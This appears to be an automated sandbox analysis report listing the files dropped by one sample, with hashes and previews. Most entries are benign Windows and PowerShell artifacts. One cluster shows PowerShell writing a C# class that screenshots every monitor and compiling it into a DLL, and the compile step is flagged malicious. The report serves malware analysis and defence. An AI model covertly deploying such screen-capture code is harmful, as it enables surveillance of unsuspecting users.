SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o3ctiwyr.3ur.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4qay3hr.gwy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rnf0kmsg.ozn.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tnlhh0st.5vv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uholqet0.rku.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ukhuejjf.vvf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v2s02kl3.dfs.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wmrp0yz1.pl2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wtvhtu30.ngv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xroh4vk3.1ow.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ye3mwz2n.41l.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yrwfdejx.t3b.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\hrvhwpsf\CSC4E15ECD8FE3B4FA09888C7495932E1F6.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.10449879807107
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryEak7Ynqq6PN5Dlq5J:+RI+ycuZhNCakS6PNnqX
MD5:	F482AE4A525DB93FE71C377E9BA2C89A
SHA1:	8973191EC0E298A8DEB45A3EB0596E52C2F645FD
SHA-256:	5AD0CBE804B8C8A00C9F28725C267385494F039EEB10FD8DEAAC46600512C511
SHA-512:	9AA07501DB920D0D6209582EA3F4A36A3C66B84BDF0E75F3AACCA6ED57E9A16DE1D307010D9B2BDAA326EBD8C963061EBE99A378267385302C87BD9622BFBD04
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.r.v.h.w.p.s.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.r.v.h.w.p.s.f...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1004
Entropy (8bit):	4.154581034278981
Encrypted:	false
SSDEEP:	24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:	C76055A0388B713A1EABE16130684DC3
SHA1:	EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:	8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:	22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:	false
Preview:	.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (606), with no line terminators
Category:	dropped
Size (bytes):	609
Entropy (8bit):	5.33550180113045
Encrypted:	false
SSDEEP:	12:p37Lvkmb6KOkqe1xBkrk+ikqOlFWZE2OlA:V3ka6KOkqeFkqOlqE2OlA
MD5:	21D3CFC168830C20457F5BAF0279A424
SHA1:	0C920DF63289A2B4EC389229A7F0B37328B4223B
SHA-256:	26DB12D8F064EB89078709362E44F5B00A42F8CCA18ED66AF666D8D8FDC3C9B7
SHA-512:	AADF20771351208D184A921914F895ECB15EB2061E633430B71A49684498478C496F510B17EF51292DC4479E1E925F69BD815C3B01FB00CCB9D5D1E88B01F078
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.0.cs"

C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.1584735502256964
Encrypted:	false
SSDEEP:	48:6/7oEAtf0KhzBU/4f6mtJjN0w4pW1ulCa32q:hNz03mrOx0K
MD5:	858F02B3129CBA10C06A3591BAA42628
SHA1:	0EE3CE3C33C144DE0BCBDA48BC8E0329AEA00200
SHA-256:	B8C57C9E0E823CA85852F004F6736B47AEB8B01D651926EB2A6D9C146F5AACB9
SHA-512:	A7FEEB416B2EA9BDD6006AB0E08E649FE175AD8C308CC4ED798EB37D75D9CFBB352F43E11D1D64A6ADA5C7BF469B6058DD063107BC5B980BE2D2CE58D2BA2E4A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ug...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k.......(....B.(j........9.Q...........{.........(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (711), with CRLF, CR line terminators
Category:	modified
Size (bytes):	1152
Entropy (8bit):	5.479249392312127
Encrypted:	false
SSDEEP:	24:KLrZZeMId3ka6KOkqeFkqOlqE2Ol1Kax5DqBVKVrdFAMBJTH:2rZMMkka6NkqeFkqNE28K2DcVKdBJj
MD5:	A26E7B205F61539D3B12D489BD6216AC
SHA1:	9676133148B362091118A7C28D7C83EFAA2D0D99
SHA-256:	CD356C277283A224BB68810BAE0A814392129D0ADD6BA838DF41363AD6029317
SHA-512:	D981812E11F1462D74384AA525C4307B91072F7AEE830A67486E8DDB866A817B7304CC1F52F7CA45D1CA15069B5DBB02130E9DA867E4F65BBA2A30546B3437B2
Malicious:	false
Preview:	.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no lo

C:\Windows\Logs\SIH\SIH.20250101.161213.463.1.etl

Download File

Process:	C:\Windows\System32\SIHClient.exe
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.2919339838027604
Encrypted:	false
SSDEEP:	192:FG+swS21r8zsDBX8XWXkcaOXBXBXdbSXEXpXCD0ErKR:FFS21r8zsDBX8XWXknOXBXBXdmXEXpXb
MD5:	B469531A4103A6E82CA32AB5BEB02A6A
SHA1:	3F1B8A67790F014FE81649145F24B933F9CCB69D
SHA-256:	357A690044D2DB49C879863E15B6572B044232B5B9E6D2F0A0620D78D83490C3
SHA-512:	59AA04ABA407AC829F5E63E0BADCAADFE901E6DFD266C66B903E5877047FC8118DA421E80E5C8CCB59C687BB268380E5F949985555AE22A19748D0F246A84B68
Malicious:	false
Preview:	....P...P.......................................P...!...........................................................eJ......H...\..Zb....... ......................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W...............c..\..........S.I.H._.t.r.a.c.e._.l.o.g...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.S.I.H.\.S.I.H...2.0.2.5.0.1.0.1...1.6.1.2.1.3...4.6.3...1...e.t.l.......P.P.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMP97EB.tmp

Download File

Process:	C:\Windows\System32\SIHClient.exe
File Type:	Microsoft Cabinet archive data, single, 462 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 31944, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
Category:	dropped
Size (bytes):	17126
Entropy (8bit):	7.3117215578334935
Encrypted:	false
SSDEEP:	192:D5X8WyNHDHFzqDHt8AxL5TKG+tJSdqnajapCNjFZYECUqY7oX9qhnJSdqnaja2Sl:qDlsHq4ThPdlmY9CUiqOdlm2W
MD5:	1B6460EE0273E97C251F7A67F49ACDB4
SHA1:	4A3FDFBB1865C3DAED996BDB5C634AA5164ABBB8
SHA-256:	3158032BAC1A6D278CCC2B7D91E2FBC9F01BEABF9C75D500A7F161E69F2C5F4A
SHA-512:	3D256D8AC917C6733BAB7CC4537A17D37810EFD690BCA0FA361CF44583476121C9BCCCD9C53994AE05E9F9DFF94FFAD1BB30C0F7AFF6DF68F73411703E3DF88A
Malicious:	false
Preview:	MSCF............D................\|...............A..........d.......................environment.xml.....b...CK..ao.0...J...&.q...-..;+.6+-i.......7.....=....g.P.RQ.#..#...QQ..p.kk..qX..)...T.....zL#<.4......\k..f..,.Q...`..K7.hP..".E.53.V.DW.X).z.=`.COO 8..8.......!$.P!`00....E.m..l .)".J.vC..J..&...5.5(.a..!..MIM.........z.;......t.<.o..\|CR.3>..n.;8dX....:....N.....U.......J.I(vT..3...N....$.._^.A<....&=._(N....m.u.1}.....Ax.b8....q~.i..0.A....H........A.0.@....1.0...`.H.e......0....+.....7......0..0V..+.....7....H.......$f.....`..41200..+.....7...1". ...,..gK.........(...._`Oa..;%.010...`.H.e....... K...,.%@.b./.a...Q.:..E.7....V~....0...0..........3....!.G~&.9......0....H........0~1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1(0&..U....Microsoft Update Signing CA 2.20...190502214449Z..200502214449Z0o1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1.0...U....Microsoft Update0.."0...

C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\sls.cab

Download File

Process:	C:\Windows\System32\SIHClient.exe
File Type:	Microsoft Cabinet archive data, single, 7826 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 53283, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
Category:	dropped
Size (bytes):	24490
Entropy (8bit):	7.629144636744632
Encrypted:	false
SSDEEP:	384:iarwQcY8StpA7IQ6GCq30XPSIleI7lzCuqvfiSIleIx:iartHA7PCFP66Tqvfi6c
MD5:	ACD24F781C0C8F48A0BD86A0E9F2A154
SHA1:	93B2F4FBF96D15BE0766181AFACDB9FD9DD1B323
SHA-256:	5C0A296B3574D170D69C90B092611646FE8991B8D103D412499DBE7BFDCCCC49
SHA-512:	7B1D821CF1210947344FCF0F9C4927B42271669015DEA1C179B2BEAD9025941138C139C22C068CBD7219B853C80FA01A04E26790D8D76A38FB8BEBE20E0A2A4A
Malicious:	false
Preview:	MSCF............D...............#................A..........d........B..............environment.cab.x.\&..BCK.\.T...N.....;LB.JW.. .w!....$...U....."........ (.. E..........w...e.Jf.3gN.{...{V.M4.!.....hn. p(... .a...f..f..j.....Kh5..l.DB\}.=.0.>..X.....z..,'..LC/>....h.>.>.........,~mVI.....'EGD]^..\{....Q....f...4.F.....q..FF.1~...Q,.."g.qq.......}.....g%Zz.;m.9..z../2Jl.p8wGO......-V....FM......y.....Hy.xy......N.r;.@uV........Xa...b].`..F...y.Wd.e.8.[Z.s7].....=B.$...'.\|.-.sC....a_(..$..i.C.T.F}...]...m.R,y.1...'..j3.....ir..B..)sR.G...`-=.w....m..2y.....o...\{..C.4.:ZM..wL-$.I.x:?.!.....:..W.%&.....J.%.....~....E..T.d.Q{..p..J..pY...P../.."rp....`...#w.....'.\|n%Dy,.....i....."..x.....b._..\_.^.XOo..*:.&a.`..qA.?.@..t.R/...X3.nF.&........1Z.r.S...9x........?..aP..A...f..k:..\....L...t....Q...1..A..33A1.t..)...c....;......$.$..>._....A.!g`..t...b.H.L..&.....!......v~.n...uE.x...."5.h.4..B.R.d.4.%--.`.B..."..[....l......x(..5......@.zr....

C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMP823D.tmp

Download File

Process:	C:\Windows\System32\SIHClient.exe
File Type:	Microsoft Cabinet archive data, single, 858 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 12183, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
Category:	modified
Size (bytes):	19826
Entropy (8bit):	7.454351722487538
Encrypted:	false
SSDEEP:	384:3j+naF6zsHqnltHNsAR9zCfsOCUPTNbZR9zOzD8K:z1F6JLts89zIdrFT9zwoK
MD5:	455385A0D5098033A4C17F7B85593E6A
SHA1:	E94CC93C84E9A3A99CAD3C2BD01BFD8829A3BCD6
SHA-256:	2798430E34DF443265228B6F510FC0CFAC333100194289ED0488D1D62C5367A7
SHA-512:	104FA2DAD10520D46EB537786868515683752665757824068383DC4B9C03121B79D9F519D8842878DB02C9630D1DFE2BBC6E4D7B08AFC820E813C250B735621A
Malicious:	false
Preview:	MSCF....Z.......D................/..........Z....J..........d.......................environment.xml........CK....8.....w..=.9%T`.eu:.jn.E.8......m_.o?...5.K.{.3X3....^.{i..b......{.+.....y:..KW;;\..n.K=.]k..{.=..3......D$.&IQH.$-..8.r.{..HP.........g....^..~......e.f2^..N.`.B..o.t....z..3..[#..{S.m..w....<M...j..6.k.K.....~.SP.mx..;N.5..~\.[.!gP...9r@"82"%.B%..<2.c....vO..hB.Fi....{...;.}..f\|..g.7..6..].7B..O..#d..]Ls.k..Le...2...&I.Q.,....0.\.-.#..L%.Z.G..K.tU.n...J..TM....4....~...:..2.X..p.d....&.Bj.P(.."..).s.d....W.=n8...n...rr..O._.yu...R..$....[...=H"K<.`.e...d.1.3.gk....M..<R......%1BX.[......X.....q......:...3..w....QN7. .qF..A......Q.p...G...JtL...8sr.s.eQ.zD.u...s.....tjj.G.....Fo...f`Bb<.]k..e.b..,......1.:-....K.......M..;....(,.W.V(^_.....9.,`\|...9...>..R...2\|.\|5.r....n.y>wwU..5...0.J....H........J.0.I....1.0...`.H.e......0....+.....7......0..0V..+.....7....H.......$f.....`..41200..+.....7...1". ...>^..~a..e.D.V.C...

C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\sls.cab

Download File

Process:	C:\Windows\System32\SIHClient.exe
File Type:	Microsoft Cabinet archive data, single, 11149 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 18779, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
Category:	dropped
Size (bytes):	30005
Entropy (8bit):	7.7369400192915085
Encrypted:	false
SSDEEP:	768:ouCAyCeQ8fkZdfTGo/its89z8gjP69zA4:Aqf56z8HzT
MD5:	4D7FE667BCB647FE9F2DA6FC8B95BDAE
SHA1:	B4B20C75C9AC2AD00D131E387BCB839F6FAAABCA
SHA-256:	BE273EA75322249FBF58C9CAD3C8DA5A70811837EF9064733E4F5FF1969D4078
SHA-512:	DDB8569A5A5F9AD3CCB990B0A723B64CEE4D49FA6515A8E5C029C1B9E2801F59259A0FC401E27372C133952E4C4840521419EF75895260FA22DFF91E0BE09C02
Malicious:	false
Preview:	MSCF.....+......D...............[I...........+...I..........d.......rM..............environment.cab...Q.!+rMCK.\|.XT....CI7.....AR..$..C$D....RA:....T..........o...g...>.....s....z...>..<...J.R.A......%}..... 0............\...e.z...@..{..,./.:9:X8.s^q...>.(]...I)....'..v@....!.(.i.n.!.g.8\/.+X3.E.~.pi...Q...B...."Oj..~.:....M....uB.}..v.WR........tDD......D7..j..`..5..E.2.z..C....4.s....r..Y.:.\|.mtg...S..b._.....!.~Kn..E.=...x.N..e.)....xz...p..h.;..xR'...U.}........nK.+.Y........p..r _.;?.m}$..%&...8. 7..T....,7..F...e...kI.y...q....".W.W..[..gZQ.....W.$k.T"...N....5.R...,+...u.~VO...R-......H7..9........].K....]....tS~.LSi....T....3+........k......i.J.y...,.Y\|.N.t.LX.....zu..8......S7..{y.m.....Ob.....^.S8Kn.i.._.c~.x.ce.A...t........S.......i1......V..S]H....$..J....E..j...4...o.$..).....;.n<.b.}.(.J.]...Q..u,.-.Bm.[z.j..-i.."...._v.......N..+...g..v..../...;G.Yw....0..u...z....J..K.E..s&..u.h3.]J.G............Z....=.N.X..

\Device\ConDrv

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.331807756485642
Encrypted:	false
SSDEEP:	3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
MD5:	195D02DA13D597A52F848A9B28D871F6
SHA1:	D048766A802C61655B9689E953103236EACCB1C7
SHA-256:	ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
